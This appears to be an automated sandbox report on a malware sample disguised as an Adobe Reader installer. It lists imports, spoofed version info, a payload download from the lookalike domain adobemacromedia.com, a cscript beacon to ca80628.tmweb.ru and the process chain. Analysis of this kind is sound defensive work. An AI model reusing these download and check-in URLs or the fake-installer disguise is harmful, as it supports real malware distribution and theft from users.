KERNEL32.dll	GlobalUnlock, GetModuleFileNameW, InterlockedIncrement, InterlockedDecrement, CompareStringW, GetDriveTypeW, lstrcmpiW, GetVersionExW, lstrlenW, FreeLibrary, LoadLibraryW, CreateDirectoryW, GetCurrentProcessId, GetExitCodeThread, SetEvent, CreateEventW, GlobalLock, GlobalAlloc, lstrcmpW, GetFileSize, SetStdHandle, WriteConsoleW, WriteConsoleA, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, GetConsoleMode, GetConsoleCP, GetTickCount, QueryPerformanceCounter, GetStartupInfoA, SetLastError, SetHandleCount, GetEnvironmentStringsW, FreeEnvironmentStringsW, IsValidCodePage, GetOEMCP, GetACP, HeapCreate, ReadFile, LCMapStringA, GetCPInfo, RtlUnwind, ExitProcess, TlsFree, TlsSetValue, LoadLibraryA, TlsGetValue, GetStartupInfoW, GetSystemTimeAsFileTime, IsDebuggerPresent, UnhandledExceptionFilter, TerminateProcess, HeapSize, HeapReAlloc, HeapDestroy, VirtualAlloc, VirtualFree, IsProcessorFeaturePresent, HeapAlloc, GetProcessHeap, HeapFree, InterlockedCompareExchange, PeekNamedPipe, OpenEventW, SearchPathW, GetLocaleInfoA, GetStringTypeW, ConnectNamedPipe, CreateNamedPipeW, ResetEvent, MoveFileW, TerminateThread, GetSystemDirectoryW, GetLocalTime, OutputDebugStringW, GlobalMemoryStatus, GetVersion, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, GetWindowsDirectoryW, GetUserDefaultLangID, GetSystemDefaultLangID, GlobalFree, GetTempPathW, GetTempPathA, GetSystemTime, GetTempFileNameW, DeleteFileW, GetTempFileNameA, DeleteFileA, FindFirstFileW, RemoveDirectoryW, FindNextFileW, GetLogicalDriveStringsW, GetFileAttributesW, CreateFileA, SetFileAttributesW, WaitForMultipleObjects, GetSystemInfo, InterlockedExchange, WideCharToMultiByte, LoadLibraryExW, MultiByteToWideChar, FindClose, CopyFileW, LCMapStringW, GetDiskFreeSpaceExW, Sleep, GetLastError, GetCurrentThreadId, WaitForSingleObject, MulDiv, lstrcpynW, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, GetLocaleInfoW, EnumResourceLanguagesW, SetEndOfFile, SetCurrentDirectoryW, GetCommandLineW, UnlockFile, LockFile, GetExitCodeProcess, CreateProcessA, CreateProcessW, DuplicateHandle, LeaveCriticalSection, GetModuleFileNameA, FlushFileBuffers, SetFilePointer, GetConsoleOutputCP, GetConsoleScreenBufferInfo, GetStdHandle, SetConsoleTextAttribute, GetFullPathNameW, GetCurrentThread, GetEnvironmentVariableW, InitializeCriticalSection, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleW, GetProcAddress, RaiseException, FlushInstructionCache, GetCurrentProcess, CloseHandle, WriteFile, CreateFileW, GetFileType, TlsAlloc, GetShortPathNameW, LocalAlloc, FormatMessageW, CreateThread, SetUnhandledExceptionFilter, LocalFree
USER32.dll	GetWindow, GetClientRect, GetWindowTextW, GetWindowTextLengthW, FillRect, IsWindow, ShowWindow, GetWindowRect, UnionRect, GetParent, BeginPaint, EndPaint, ScreenToClient, SetWindowPos, GetWindowDC, LookupIconIdFromDirectoryEx, CallWindowProcW, DefWindowProcW, GetWindowLongW, IsWindowVisible, MapWindowPoints, SetWindowLongW, SendMessageW, DrawFrameControl, RegisterWindowMessageW, InvalidateRgn, GetDesktopWindow, GetKeyState, DrawStateW, DrawTextExW, DrawFocusRect, ValidateRect, DestroyMenu, AppendMenuW, CreatePopupMenu, TrackPopupMenu, InflateRect, LoadBitmapW, MessageBeep, CharNextW, GetClassNameW, ReleaseCapture, SetCapture, UpdateWindow, DestroyIcon, GetDlgCtrlID, GetCapture, SetScrollInfo, GetScrollPos, GetClassInfoExW, RegisterClassExW, DrawEdge, SetScrollPos, SetRect, MoveWindow, GetScrollInfo, GetMessagePos, SystemParametersInfoW, GetActiveWindow, TrackMouseEvent, GetAsyncKeyState, DestroyCursor, GetWindowRgn, IsZoomed, SetWindowRgn, GetComboBoxInfo, DestroyAcceleratorTable, CreateAcceleratorTableW, TranslateAcceleratorW, CreateDialogParamW, EndDialog, DialogBoxParamW, InvalidateRect, GetNextDlgTabItem, SetCursor, MonitorFromWindow, GetMonitorInfoW, LoadImageW, IsDialogMessageW, IsChild, PostQuitMessage, PostMessageW, SetForegroundWindow, SetCursorPos, GetCursorPos, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, LoadCursorW, LoadStringW, MessageBoxW, GetFocus, EnableWindow, DestroyWindow, LoadIconW, DialogBoxIndirectParamW, GetForegroundWindow, MsgWaitForMultipleObjects, EnumWindows, GetWindowThreadProcessId, GetPropW, GetSystemMenu, EnableMenuItem, ModifyMenuW, FindWindowW, ExitWindowsEx, GetScrollRange, SetPropW, RemovePropW, LoadMenuW, GetSubMenu, OpenClipboard, CloseClipboard, EmptyClipboard, SetClipboardData, GetIconInfo, SendMessageTimeoutW, UnregisterClassA, DrawTextW, DrawIconEx, GetSystemMetrics, ClientToScreen, OffsetRect, SetRectEmpty, PtInRect, GetSysColorBrush, IntersectRect, IsRectEmpty, SendMessageA, IsWindowEnabled, CopyRect, RedrawWindow, SetFocus, GetSysColor, CreateWindowExW, GetDlgItem, SetWindowTextW, EqualRect, SetTimer, KillTimer, GetDC, ReleaseDC, CreateIconFromResourceEx
GDI32.dll	GetLayout, GetBrushOrgEx, CreateFontIndirectW, CreateSolidBrush, GetRgnBox, EqualRgn, CreatePolygonRgn, CreateRectRgnIndirect, GetStockObject, CreateFontW, SetBkMode, SetTextColor, SetBrushOrgEx, CreatePatternBrush, FillRgn, SelectClipRgn, GetBitmapBits, CreateRectRgn, GetObjectW, GetDeviceCaps, Rectangle, ExcludeClipRect, CreatePen, ExtTextOutW, SetBkColor, BitBlt, SetViewportOrgEx, CreateCompatibleBitmap, CreateCompatibleDC, DeleteObject, SelectObject, DeleteDC, CreateDIBSection, CreateBitmapIndirect, CombineRgn
ADVAPI32.dll	RegOpenKeyW, LookupPrivilegeValueW, LookupAccountSidW, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, SetEntriesInAclW, GetSecurityDescriptorDacl, StartServiceW, QueryServiceStatus, OpenServiceW, RegDeleteValueA, RegQueryValueExA, RegOpenKeyA, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegEnumKeyExW, RegQueryInfoKeyW, RegDeleteKeyW, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, RegSetValueExA, OpenSCManagerW, LockServiceDatabase, UnlockServiceDatabase, CloseServiceHandle, RegOpenKeyExA, RegEnumValueA, AdjustTokenPrivileges, RegCreateKeyW, OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, EqualSid, FreeSid, GetUserNameW, RegDeleteKeyA, RegCreateKeyA
SHELL32.dll	ShellExecuteW, ShellExecuteExW, SHGetFolderPathW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	CoTaskMemRealloc, CoTaskMemFree, CoInitialize, OleInitialize, CLSIDFromString, CLSIDFromProgID, CoGetClassObject, CoCreateInstance, CreateStreamOnHGlobal, OleLockRunning, CoTaskMemAlloc, OleUninitialize, CoUninitialize, CoCreateGuid, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CoInitializeEx, StringFromGUID2
OLEAUT32.dll	VarUI4FromStr, VarDateFromStr, OleLoadPicture, SysStringByteLen, SysAllocStringByteLen, SysAllocStringLen, LoadTypeLib, LoadRegTypeLib, SysStringLen, OleCreateFontIndirect, VariantCopy, VariantInit, VariantClear, SysAllocString, SysFreeString
dbghelp.dll	SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, SymFunctionTableAccess, StackWalk, SymGetModuleBase
SHLWAPI.dll	PathAddBackslashW, PathIsUNCW, PathIsDirectoryW, PathFileExistsW
COMCTL32.dll	ImageList_Create, PropertySheetW, DestroyPropertySheetPage, InitCommonControlsEx, ImageList_LoadImageW, ImageList_GetIcon, ImageList_AddMasked, ImageList_SetBkColor, _TrackMouseEvent, ImageList_Add, ImageList_ReplaceIcon, ImageList_Destroy, CreatePropertySheetPageW
MSIMG32.dll	TransparentBlt, AlphaBlend
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
NETAPI32.dll	NetUserGetLocalGroups, NetApiBufferFree, NetLocalGroupGetMembers
Secur32.dll	GetUserNameExW
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2018 Adobe
InternalName	readerupd_en_xa_cra_install
FileVersion	12.0.1
CompanyName	Adobe
ProductName	Adobe Reader
ProductVersion	12.0.1
FileDescription	This installer database contains the logic and data required to install Adobe Reader.
OriginalFileName	readerupd_en_xa_cra_install.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2018 10:31:38.864955902 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 30, 2018 10:31:38.898731947 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 30, 2018 10:31:38.962035894 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:38.975625038 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:38.975795031 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:38.976784945 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:38.989934921 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.025731087 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.025787115 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.025820971 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.025903940 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.025960922 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026000023 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026035070 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026038885 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.026125908 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026164055 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026199102 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026232958 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.026237011 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.026367903 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.039561987 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.039609909 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.039659977 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.039680958 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.039685011 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.040131092 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.040714979 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.040761948 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.040791035 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.040858984 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.041785002 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.041847944 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.041884899 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.041918993 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.041923046 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.043133020 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.043198109 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.043298006 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.044176102 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.044239998 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.044302940 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.045428038 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.045533895 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.045537949 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.046009064 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.046576023 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.046654940 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.046691895 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.046705961 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.046870947 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.052820921 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.052856922 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.052953005 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.073999882 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074053049 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074089050 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074127913 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074182987 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.074537039 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074670076 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074708939 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.074716091 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.074744940 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.075033903 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.075407028 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.075519085 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.075561047 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.075599909 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.075635910 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.075659037 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.075931072 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.076545954 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.076591969 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.076643944 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.076673031 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.076678991 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.077061892 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.077436924 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.077476025 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.077569008 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.077574968 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.077606916 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.077822924 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.078243017 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.078377962 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.078388929 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.078428030 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.078463078 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.078567028 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.079190016 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.079229116 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.079309940 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.079355001 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.079394102 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.079453945 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.080362082 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.080497026 CEST	49161	80	192.168.2.2	104.28.4.137
Aug 30, 2018 10:31:39.080502987 CEST	80	49161	104.28.4.137	192.168.2.2
Aug 30, 2018 10:31:39.080540895 CEST	80	49161	104.28.4.137	192.168.2.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2018 10:31:38.864955902 CEST	56842	53	192.168.2.2	8.8.8.8
Aug 30, 2018 10:31:38.898731947 CEST	53	56842	8.8.8.8	192.168.2.2
Aug 30, 2018 10:34:10.458075047 CEST	53440	53	192.168.2.2	8.8.8.8
Aug 30, 2018 10:34:11.457103968 CEST	53440	53	192.168.2.2	8.8.8.8
Aug 30, 2018 10:34:12.458865881 CEST	53440	53	192.168.2.2	8.8.8.8
Aug 30, 2018 10:34:13.480992079 CEST	53	53440	8.8.8.8	192.168.2.2
Aug 30, 2018 10:34:13.483669043 CEST	53	53440	8.8.8.8	192.168.2.2
Aug 30, 2018 10:34:13.483699083 CEST	53	53440	8.8.8.8	192.168.2.2
Aug 30, 2018 10:34:13.491132021 CEST	59605	53	192.168.2.2	8.8.8.8
Aug 30, 2018 10:34:13.563489914 CEST	53	59605	8.8.8.8	192.168.2.2

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 30, 2018 10:34:13.483732939 CEST	192.168.2.2	8.8.8.8	d002	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 30, 2018 10:31:38.864955902 CEST	192.168.2.2	8.8.8.8	0x982d	Standard query (0)	adobemacromedia.com	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:10.458075047 CEST	192.168.2.2	8.8.8.8	0xb752	Standard query (0)	ca80628.tmweb.ru	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:11.457103968 CEST	192.168.2.2	8.8.8.8	0xb752	Standard query (0)	ca80628.tmweb.ru	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:12.458865881 CEST	192.168.2.2	8.8.8.8	0xb752	Standard query (0)	ca80628.tmweb.ru	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:13.491132021 CEST	192.168.2.2	8.8.8.8	0x570d	Standard query (0)	ca80628.tmweb.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Aug 30, 2018 10:31:38.898731947 CEST	8.8.8.8	192.168.2.2	0x982d	No error (0)	adobemacromedia.com	104.28.4.137	A (IP address)	IN (0x0001)
Aug 30, 2018 10:31:38.898731947 CEST	8.8.8.8	192.168.2.2	0x982d	No error (0)	adobemacromedia.com	104.28.5.137	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:13.480992079 CEST	8.8.8.8	192.168.2.2	0xb752	No error (0)	ca80628.tmweb.ru	92.53.96.130	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:13.483669043 CEST	8.8.8.8	192.168.2.2	0xb752	No error (0)	ca80628.tmweb.ru	92.53.96.130	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:13.483699083 CEST	8.8.8.8	192.168.2.2	0xb752	No error (0)	ca80628.tmweb.ru	92.53.96.130	A (IP address)	IN (0x0001)
Aug 30, 2018 10:34:13.563489914 CEST	8.8.8.8	192.168.2.2	0x570d	No error (0)	ca80628.tmweb.ru	92.53.96.130	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

adobemacromedia.com

ca80628.tmweb.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49161	104.28.4.137	80	C:\Windows\System32\msiexec.exe

Timestamp	kBytes transferred	Direction	Data
Aug 30, 2018 10:31:38.976784945 CEST	0	OUT	GET /setup.exe HTTP/1.1 Accept: / User-Agent: AdvancedInstaller Host: adobemacromedia.com Connection: Keep-Alive Cache-Control: no-cache
Aug 30, 2018 10:31:39.025731087 CEST	1	IN	HTTP/1.1 200 OK Date: Thu, 30 Aug 2018 08:31:39 GMT Content-Type: application/x-msdownload Content-Length: 13509120 Connection: keep-alive Set-Cookie: __cfduid=d6220ea83677096d27ca5dc8f5806feef1535617898; expires=Fri, 30-Aug-19 08:31:38 GMT; path=/; domain=.adobemacromedia.com; HttpOnly Last-Modified: Tue, 10 Apr 2018 20:55:20 GMT Accept-Ranges: bytes Server: cloudflare CF-RAY: 4525e6fca7103e9e-ZRH Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 46 02 00 00 7c 00 00 00 00 00 00 68 54 02 00 00 10 00 00 00 60 02 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 77 b3 03 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 98 17 00 00 00 10 03 00 dc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 84 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 cc 44 02 00 00 10 00 00 00 46 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 94 28 00 00 00 60 02 00 00 2a 00 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 f5 10 00 00 00 90 02 00 00 00 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 98 17 00 00 00 b0 02 00 00 18 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 d0 02 00 00 00 00 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 e0 02 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^BF\|hT`@0w@CODEDF `DATA(`J@BSSt.idatat@.tls.rdata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.2	49162	92.53.96.130	80	C:\Windows\System32\cscript.exe

Timestamp	kBytes transferred	Direction	Data
Aug 30, 2018 10:34:13.628961086 CEST	14484	OUT	GET /f.php?data=000-000-000-000&id_k=1 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ca80628.tmweb.ru
Aug 30, 2018 10:34:14.291840076 CEST	14484	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 Date: Thu, 30 Aug 2018 08:34:14 GMT Content-Type: text/html; charset=utf-8 Content-Length: 7 Connection: keep-alive X-Powered-By: PHP/5.3.29 Data Raw: 73 75 63 63 65 73 73 Data Ascii: success

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: CDaNsQ7Rrd.exe PID: 3256 Parent PID: 3056

General

Start time:	10:31:45
Start date:	30/08/2018
Path:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\CDaNsQ7Rrd.exe'
Imagebase:	0x200000
File size:	2523958 bytes
MD5 hash:	EDA8E4F2DF81E0BA5B88D73DE9779205
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: msiexec.exe PID: 3348 Parent PID: 2732

General

Start time:	10:31:46
Start date:	30/08/2018
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\MsiExec.exe -Embedding AA4D321CBB51DB47279651D4C4A42DCE C
Imagebase:	0x680000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: CDaNsQ7Rrd.exe PID: 3552 Parent PID: 3256

General

Start time:	10:32:09
Start date:	30/08/2018
Path:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Imagebase:	0x200000
File size:	2523958 bytes
MD5 hash:	EDA8E4F2DF81E0BA5B88D73DE9779205
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: msiexec.exe PID: 2152 Parent PID: 2732

General

Start time:	10:33:21
Start date:	30/08/2018
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\MsiExec.exe -Embedding 811B175E7191221789A53427DBAD15F3
Imagebase:	0x680000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: setup.exe PID: 2496 Parent PID: 3348

General

Start time:	10:33:27
Start date:	30/08/2018
Path:	C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe'
Imagebase:	0x400000
File size:	13509120 bytes
MD5 hash:	AC0DDC4F9C3FDA9A3A4EAD0DD91BBE47
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: taskeng.exe PID: 2644 Parent PID: 848

General

Start time:	10:33:29
Start date:	30/08/2018
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
